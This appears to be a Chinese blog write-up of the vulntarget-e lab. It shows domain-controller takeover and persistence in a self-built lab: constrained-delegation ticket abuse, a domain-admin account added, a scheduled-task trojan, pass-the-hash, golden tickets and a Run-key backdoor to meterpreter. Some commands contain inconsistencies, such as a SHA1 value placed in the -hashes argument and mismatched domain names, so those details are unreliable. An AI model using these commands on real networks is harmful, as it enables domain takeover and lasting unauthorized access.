【永久开源】vulntarget-e续集
✎ 阅读须知
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
vulntarget-e
vulntarget漏洞靶场系列(五)— vulntarget-e
【永久开源】vulntarget-e打靶记录—作者:NaMi
1. 约束委派
再打完vulntarget-e靶机后,应半人间丶师傅的问题,在这里做个后续的话题。当时也是着急没做好最后的步骤,现在来补一下。
看网上的教程还有我自己打的靶机,很多时候都是dir到域控目录就结束了。在这里做域控的权限维持也有许多工作需要做,拿下域控之后还有好多信息需要从域控中获取,然后拿到指定的机器。靶机环境我这里丢失了,用自己搭的环境来进行操作,环境还是相同的。通过资源委派拿到域控的票据之后就可以使用IPC访问域控的文件,还是从约束委派开始做起 通过命令查找配置了约束委派的用户,假设我们已经拿到当前机器的用户名密码了 nami.com\win2008 : admin_@_2008
使用命令查找约束委派对应的服务
AdFind.exe -h 192.168.1.105 -u win2008 -up admin@2008 -b "DC=nami,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto 可以访问域控的CIFS服务
使用kekeo请求用户的TGT
tgt::ask /user:win2008 /domain:nami.com /password:admin@2008 /ticket:administrator.kirbi 通过s4u请求以administrator身份访问域控的ST
tgs::s4u /tgt:TGT_win2008@NAMI.COM_krbtgt~nami.com@NAMI.COM.kirbi /user:Administrator@nami.com /service:cifs/DC.nami.com 使用mimikatz将请求到的票据导入当前内存:
kerberos::ptt TGS_Administrator@nami.com@NAMI.COM_cifs~WIN-A7DM9L6CVHH.nami.com@NAMI.COM.kirbi 
2. 域控权限维持
2.1 添加用户
在这里的访问dir的权限很快就掉了,使用命令添加用户:
添加域用户到域管理员
net group "domain admins" user1 /add /domain
使用psexec直接连接:
或者使用wmiexec:
CS或者MSF自带模块:
2.2 计划任务
使用copy命令上传文件到域控制器,由于目标开启了防火墙,需要自行免杀:
copy msf.exe \WIN-A7DM9L6CVHH.nami.com\C$
使用计划任务执行木马文件,失败:
schtasks /create /s 192.168.1.105 /ru "SYSTEM" /tn 777 /sc DAILY /st 22:26:00 /tr c:/msf.exe /F使用psexec64.exe \\WIN-A7DM9L6CVHH.nami.com -s cmd
然后在执行后门就可以上线,在这个命令行执行执行程序会报错:
schtasks /create /s 192.168.1.105 /ru "SYSTEM" /tn 124 /sc DAILY /st 23:18:00 /tr c:/shell3.exe /F
schtasks /run /s 192.168.1.105 /tn 124 /i
2.3 HASH
因为我没有免杀mimikatz就直接关掉了防火墙来做测试,当你拥有了任意用户的hash之后:
Username : Administrator
Domain : NAMI0
NTLM : 84492f09055145d8c0a071c1d52d2330
SHA1 : 25c8920e4863e2de8777ca05d9bc2981c4936f8e
DPAPI : b996d3f33c0dd19f0e451730cd2f2e0b
输入命令:
impacket-psexec -hashes 25c8920e4863e2de8777ca05d9bc2981c4936f8e:84492f09055145d8c0a071c1d52d2330 administrator@192.168.1.105 -s cmd
2.4 黄金票据
导入krbtgt的hash
lsadump::dcsync /domain:nami.com /user:krbtgt
使用krbtgt的SID和Hash NTML制作黄金票据:
kerberos::golden /user:administrator /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /krbtgt:7152415a1cc58b8e40f2c23d96d81f9a /ticket:Administrator.kiribi
会在当前目录下生成这个文件:
注入票据后:
使用krbtgt的SID和Hash NTLM:
mimikatz "kerberos::golden /user:system /domain:nanami.com /sid:S-1-5-21-3233421677-56833409-1549726892 /rc4:5a023092f112c19c81230835dcb1c5ee /ptt" exit
2.5 修改注册表
修改注册表进行自启的操作
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\shell3.exe"
下次登录之后,会将会话返回给meterpreter
详细方法网上也有写到
3. 参考链接
https://www.cnblogs.com/zpchcbd/p/11804491.html
腾讯云开发者
